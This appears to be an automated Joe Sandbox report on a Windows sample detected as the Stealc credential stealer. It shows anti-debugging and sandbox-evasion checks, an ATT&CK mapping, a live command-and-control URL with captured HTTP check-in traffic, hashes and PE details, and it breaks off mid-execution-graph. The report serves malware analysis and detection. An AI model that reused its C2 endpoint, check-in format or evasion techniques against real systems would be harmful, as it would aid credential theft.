                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008745C0 VirtualProtect ?,00000004,00000100,000000000_2_008745C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00889860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00889860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00889750 mov eax, dword ptr fs:[00000030h]0_2_00889750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008878E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_008878E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 2888, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00889600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00889600
                Source: file.exe, file.exe, 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00887B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00887980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00887980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00887850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00887850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00887A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00887A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.870000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.2073382001.0000000005230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2117561798.00000000015BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 2888, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.870000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.2073382001.0000000005230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2117561798.00000000015BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 2888, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php~20%VirustotalBrowse
                http://185.215.113.37/e2b1563c6670f193.php&17%VirustotalBrowse
                http://185.215.113.37/l17%VirustotalBrowse
                http://185.215.113.37/e2b1563c6670f193.phpj21%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37/e2b1563c6670f193.php~file.exe, 00000000.00000002.2117561798.0000000001617000.00000004.00000020.00020000.00000000.sdmptrueunknown
                http://185.215.113.37file.exe, 00000000.00000002.2117561798.00000000015BE000.00000004.00000020.00020000.00000000.sdmptrue
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.php&file.exe, 00000000.00000002.2117561798.0000000001617000.00000004.00000020.00020000.00000000.sdmptrueunknown
                http://185.215.113.37/e2b1563c6670f193.phpjfile.exe, 00000000.00000002.2117561798.0000000001617000.00000004.00000020.00020000.00000000.sdmptrueunknown
                http://185.215.113.37/lfile.exe, 00000000.00000002.2117561798.00000000015BE000.00000004.00000020.00020000.00000000.sdmptrueunknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                185.215.113.37
                		unknownPortugal
                		206894WHOLESALECONNECTIONSNLtrue

                General Information

                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1538061
                Start date and time:2024-10-20 07:39:08 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 2m 46s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:2
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:file.exe
                Detection:MAL
                Classification:mal100.troj.evad.winEXE@1/0@0/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 80%
                • Number of executed functions: 19
                • Number of non-executed functions: 88
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Stop behavior analysis, all processes terminated

                Warnings

                • Exclude process from analysis (whitelisted): dllhost.exe
                • Report size getting too big, too many NtQueryValueKey calls found.

                Simulations

                Behavior and APIs

                No simulations

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                185.215.113.37file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                S3AYU5t2JP.exeGet hashmaliciousLummaC, Amadey, StealcBrowse
                • 185.215.113.37/
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php

                Domains

                No context

                ASNs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37
                S3AYU5t2JP.exeGet hashmaliciousLummaC, Amadey, StealcBrowse
                • 185.215.113.103
                EY5iB1Y7CH.exeGet hashmaliciousAmadeyBrowse
                • 185.215.113.43
                xvus4NLqiQ.exeGet hashmaliciousAmadeyBrowse
                • 185.215.113.43
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                • 185.215.113.103
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                No created / dropped files found

                Static File Info

                General

                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):7.948656094880637
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.96%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:file.exe
                File size:1'846'784 bytes
                MD5:ad1b355860fd1ac789fef08c2723416e
                SHA1:b8c30d3b010012c818d1f104118c4f8b511dad41
                SHA256:42f5eafd03f379e54bc398fb2f502393b381aa1a58068cbcd65ae8d9f5263beb
                SHA512:9c9c593f89db471b3f63959638be191c5f73e46fac1ae2b8a8c55cc8de4464e61d18a5c99a8ffcafb6d5b37782854cb17a02f6a40cb6d80f8887956a6f8bccc5
                SSDEEP:49152:jsso79jx/BBb+PUvQ0IILQHHpo/ZC57oP:AD71x/6PUvZ4Hpo/ZCZE
                TLSH:CC85339A6B5CB481C02D4AB1EDDFBF54BFA58D21C4A05B71AD9B41308979336CE3E870
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                File Icon

                Icon Hash:00928e8e8686b000

                Static PE Info

                General

                Entrypoint:0xa9a000
                Entrypoint Section:.taggant
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:5
                OS Version Minor:1
                File Version Major:5
                File Version Minor:1
                Subsystem Version Major:5
                Subsystem Version Minor:1
                Import Hash:2eabe9054cad5152567f0699947a2c5b

                Entrypoint Preview

                Instruction
                jmp 00007F996069EDFAh

                Rich Headers

                Programming Language:
                • [C++] VS2010 build 30319
                • [ASM] VS2010 build 30319
                • [ C ] VS2010 build 30319
                • [ C ] VS2008 SP1 build 30729
                • [IMP] VS2008 SP1 build 30729
                • [LNK] VS2010 build 30319

                Data Directories

                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                Sections

                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                0x10000x25b0000x22800fca92594be49b880de7e040d88e29811unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                0x25e0000x29e0000x200b0ff7e7fe20d9af301f90e1a33637f20unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                qmfnotwd0x4fc0000x19d0000x19cc009a58345f19907bc3c6eeabc7c70fa9e8False0.9949935645063598data7.953945835356761IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                bvdxcoxs0x6990000x10000x400e5884fbbcb4fc719a4b5048247941a89False0.791015625data6.072644121644343IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .taggant0x69a0000x30000x2200e8b3171e58083e40597776c97793c88cFalse0.07134650735294118DOS executable (COM)0.7693587921391196IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                Imports

                DLLImport
                kernel32.dlllstrcpy

                Network Behavior

                Suricata IDS Alerts

                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                2024-10-20T07:40:06.730405+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.549704185.215.113.3780TCP

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Oct 20, 2024 07:40:04.508306980 CEST4970480192.168.2.5185.215.113.37
                Oct 20, 2024 07:40:05.170535088 CEST8049704185.215.113.37192.168.2.5
                Oct 20, 2024 07:40:05.170638084 CEST4970480192.168.2.5185.215.113.37
                Oct 20, 2024 07:40:05.176989079 CEST4970480192.168.2.5185.215.113.37
                Oct 20, 2024 07:40:05.181862116 CEST8049704185.215.113.37192.168.2.5
                Oct 20, 2024 07:40:06.371413946 CEST8049704185.215.113.37192.168.2.5
                Oct 20, 2024 07:40:06.371526957 CEST4970480192.168.2.5185.215.113.37
                Oct 20, 2024 07:40:06.375034094 CEST4970480192.168.2.5185.215.113.37
                Oct 20, 2024 07:40:06.379877090 CEST8049704185.215.113.37192.168.2.5
                Oct 20, 2024 07:40:06.730314970 CEST8049704185.215.113.37192.168.2.5
                Oct 20, 2024 07:40:06.730405092 CEST4970480192.168.2.5185.215.113.37
                Oct 20, 2024 07:40:08.972914934 CEST4970480192.168.2.5185.215.113.37

                HTTP Request Dependency Graph

                • 185.215.113.37

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.549704185.215.113.37802888C:\Users\user\Desktop\file.exe
                TimestampBytes transferredDirectionData
                Oct 20, 2024 07:40:05.176989079 CEST89OUTGET / HTTP/1.1
                Host: 185.215.113.37
                Connection: Keep-Alive
                Cache-Control: no-cache
                Oct 20, 2024 07:40:06.371413946 CEST203INHTTP/1.1 200 OK
                Date: Sun, 20 Oct 2024 05:40:06 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Content-Length: 0
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: text/html; charset=UTF-8
                Oct 20, 2024 07:40:06.375034094 CEST411OUTPOST /e2b1563c6670f193.php HTTP/1.1
                Content-Type: multipart/form-data; boundary=----JJKJDAEBFCBKECBGDBFC
                Host: 185.215.113.37
                Content-Length: 210
                Connection: Keep-Alive
                Cache-Control: no-cache
                Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4b 4a 44 41 45 42 46 43 42 4b 45 43 42 47 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 38 36 37 45 43 30 30 41 45 41 46 32 38 31 32 36 33 31 37 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 4a 44 41 45 42 46 43 42 4b 45 43 42 47 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 4a 44 41 45 42 46 43 42 4b 45 43 42 47 44 42 46 43 2d 2d 0d 0a
                Data Ascii: ------JJKJDAEBFCBKECBGDBFCContent-Disposition: form-data; name="hwid"D867EC00AEAF281263175------JJKJDAEBFCBKECBGDBFCContent-Disposition: form-data; name="build"doma------JJKJDAEBFCBKECBGDBFC--
                Oct 20, 2024 07:40:06.730314970 CEST210INHTTP/1.1 200 OK
                Date: Sun, 20 Oct 2024 05:40:06 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Content-Length: 8
                Keep-Alive: timeout=5, max=99
                Connection: Keep-Alive
                Content-Type: text/html; charset=UTF-8
                Data Raw: 59 6d 78 76 59 32 73 3d
                Data Ascii: YmxvY2s=


                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                System Behavior

                General

                Target ID:0
                Start time:01:39:59
                Start date:20/10/2024
                Path:C:\Users\user\Desktop\file.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\file.exe"
                Imagebase:0x870000
                File size:1'846'784 bytes
                MD5 hash:AD1B355860FD1AC789FEF08C2723416E
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2073382001.0000000005230000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2117561798.00000000015BE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                Reputation:low
                Has exited:true

                Disassembly

                Reset < >

                  Execution Graph

                  Execution Coverage:8.1%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:10.1%
                  Total number of Nodes:2000
                  Total number of Limit Nodes:24
                  execution_graph 13244 8869f0 13289 872260 13244->13289 13268 886a64 13269 88a9b0 4 API calls 13268->13269 13270 886a6b 13269->13270 13271 88a9b0 4 API calls 13270->13271 13272 886a72 13271->13272 13273 88a9b0 4 API calls 13272->13273 13274 886a79 13273->13274 13275 88a9b0 4 API calls 13274->13275 13276 886a80 13275->13276 13441 88a8a0 13276->13441 13278 886a89 13279 886b0c 13278->13279 13282 886ac2 OpenEventA 13278->13282 13445 886920 GetSystemTime 13279->13445 13283 886ad9 13282->13283 13284 886af5 CloseHandle Sleep 13282->13284 13288 886ae1 CreateEventA 13283->13288 13286 886b0a 13284->13286 13286->13278 13288->13279 13642 8745c0 13289->13642 13291 872274 13292 8745c0 2 API calls 13291->13292 13293 87228d 13292->13293 13294 8745c0 2 API calls 13293->13294 13295 8722a6 13294->13295 13296 8745c0 2 API calls 13295->13296 13297 8722bf 13296->13297 13298 8745c0 2 API calls 13297->13298 13299 8722d8 13298->13299 13300 8745c0 2 API calls 13299->13300 13301 8722f1 13300->13301 13302 8745c0 2 API calls 13301->13302 13303 87230a 13302->13303 13304 8745c0 2 API calls 13303->13304 13305 872323 13304->13305 13306 8745c0 2 API calls 13305->13306 13307 87233c 13306->13307 13308 8745c0 2 API calls 13307->13308 13309 872355 13308->13309 13310 8745c0 2 API calls 13309->13310 13311 87236e 13310->13311 13312 8745c0 2 API calls 13311->13312 13313 872387 13312->13313 13314 8745c0 2 API calls 13313->13314 13315 8723a0 13314->13315 13316 8745c0 2 API calls 13315->13316 13317 8723b9 13316->13317 13318 8745c0 2 API calls 13317->13318 13319 8723d2 13318->13319 13320 8745c0 2 API calls 13319->13320 13321 8723eb 13320->13321 13322 8745c0 2 API calls 13321->13322 13323 872404 13322->13323 13324 8745c0 2 API calls 13323->13324 13325 87241d 13324->13325 13326 8745c0 2 API calls 13325->13326 13327 872436 13326->13327 13328 8745c0 2 API calls 13327->13328 13329 87244f 13328->13329 13330 8745c0 2 API calls 13329->13330 13331 872468 13330->13331 13332 8745c0 2 API calls 13331->13332 13333 872481 13332->13333 13334 8745c0 2 API calls 13333->13334 13335 87249a 13334->13335 13336 8745c0 2 API calls 13335->13336 13337 8724b3 13336->13337 13338 8745c0 2 API calls 13337->13338 13339 8724cc 13338->13339 13340 8745c0 2 API calls 13339->13340 13341 8724e5 13340->13341 13342 8745c0 2 API calls 13341->13342 13343 8724fe 13342->13343 13344 8745c0 2 API calls 13343->13344 13345 872517 13344->13345 13346 8745c0 2 API calls 13345->13346 13347 872530 13346->13347 13348 8745c0 2 API calls 13347->13348 13349 872549 13348->13349 13350 8745c0 2 API calls 13349->13350 13351 872562 13350->13351 13352 8745c0 2 API calls 13351->13352 13353 87257b 13352->13353 13354 8745c0 2 API calls 13353->13354 13355 872594 13354->13355 13356 8745c0 2 API calls 13355->13356 13357 8725ad 13356->13357 13358 8745c0 2 API calls 13357->13358 13359 8725c6 13358->13359 13360 8745c0 2 API calls 13359->13360 13361 8725df 13360->13361 13362 8745c0 2 API calls 13361->13362 13363 8725f8 13362->13363 13364 8745c0 2 API calls 13363->13364 13365 872611 13364->13365 13366 8745c0 2 API calls 13365->13366 13367 87262a 13366->13367 13368 8745c0 2 API calls 13367->13368 13369 872643 13368->13369 13370 8745c0 2 API calls 13369->13370 13371 87265c 13370->13371 13372 8745c0 2 API calls 13371->13372 13373 872675 13372->13373 13374 8745c0 2 API calls 13373->13374 13375 87268e 13374->13375 13376 889860 13375->13376 13647 889750 GetPEB 13376->13647 13378 889868 13379 88987a 13378->13379 13380 889a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13378->13380 13385 88988c 21 API calls 13379->13385 13381 889b0d 13380->13381 13382 889af4 GetProcAddress 13380->13382 13383 889b46 13381->13383 13384 889b16 GetProcAddress GetProcAddress 13381->13384 13382->13381 13386 889b68 13383->13386 13387 889b4f GetProcAddress 13383->13387 13384->13383 13385->13380 13388 889b89 13386->13388 13389 889b71 GetProcAddress 13386->13389 13387->13386 13390 886a00 13388->13390 13391 889b92 GetProcAddress GetProcAddress 13388->13391 13389->13388 13392 88a740 13390->13392 13391->13390 13393 88a750 13392->13393 13394 886a0d 13393->13394 13395 88a77e lstrcpy 13393->13395 13396 8711d0 13394->13396 13395->13394 13397 8711e8 13396->13397 13398 871217 13397->13398 13399 87120f ExitProcess 13397->13399 13400 871160 GetSystemInfo 13398->13400 13401 871184 13400->13401 13402 87117c ExitProcess 13400->13402 13403 871110 GetCurrentProcess VirtualAllocExNuma 13401->13403 13404 871141 ExitProcess 13403->13404 13405 871149 13403->13405 13648 8710a0 VirtualAlloc 13405->13648 13408 871220 13652 8889b0 13408->13652 13411 871249 13412 87129a 13411->13412 13413 871292 ExitProcess 13411->13413 13414 886770 GetUserDefaultLangID 13412->13414 13415 886792 13414->13415 13416 8867d3 13414->13416 13415->13416 13417 8867cb ExitProcess 13415->13417 13418 8867ad ExitProcess 13415->13418 13419 8867c1 ExitProcess 13415->13419 13420 8867a3 ExitProcess 13415->13420 13421 8867b7 ExitProcess 13415->13421 13422 871190 13416->13422 13417->13416 13423 8878e0 3 API calls 13422->13423 13425 87119e 13423->13425 13424 8711cc 13429 887850 GetProcessHeap RtlAllocateHeap GetUserNameA 13424->13429 13425->13424 13426 887850 3 API calls 13425->13426 13427 8711b7 13426->13427 13427->13424 13428 8711c4 ExitProcess 13427->13428 13430 886a30 13429->13430 13431 8878e0 GetProcessHeap RtlAllocateHeap GetComputerNameA 13430->13431 13432 886a43 13431->13432 13433 88a9b0 13432->13433 13654 88a710 13433->13654 13435 88a9c1 lstrlen 13437 88a9e0 13435->13437 13436 88aa18 13655 88a7a0 13436->13655 13437->13436 13439 88a9fa lstrcpy lstrcat 13437->13439 13439->13436 13440 88aa24 13440->13268 13442 88a8bb 13441->13442 13443 88a90b 13442->13443 13444 88a8f9 lstrcpy 13442->13444 13443->13278 13444->13443 13659 886820 13445->13659 13447 88698e 13448 886998 sscanf 13447->13448 13688 88a800 13448->13688 13450 8869aa SystemTimeToFileTime SystemTimeToFileTime 13451 8869ce 13450->13451 13452 8869e0 13450->13452 13451->13452 13453 8869d8 ExitProcess 13451->13453 13454 885b10 13452->13454 13455 885b1d 13454->13455 13456 88a740 lstrcpy 13455->13456 13457 885b2e 13456->13457 13690 88a820 lstrlen 13457->13690 13460 88a820 2 API calls 13461 885b64 13460->13461 13462 88a820 2 API calls 13461->13462 13463 885b74 13462->13463 13694 886430 13463->13694 13466 88a820 2 API calls 13467 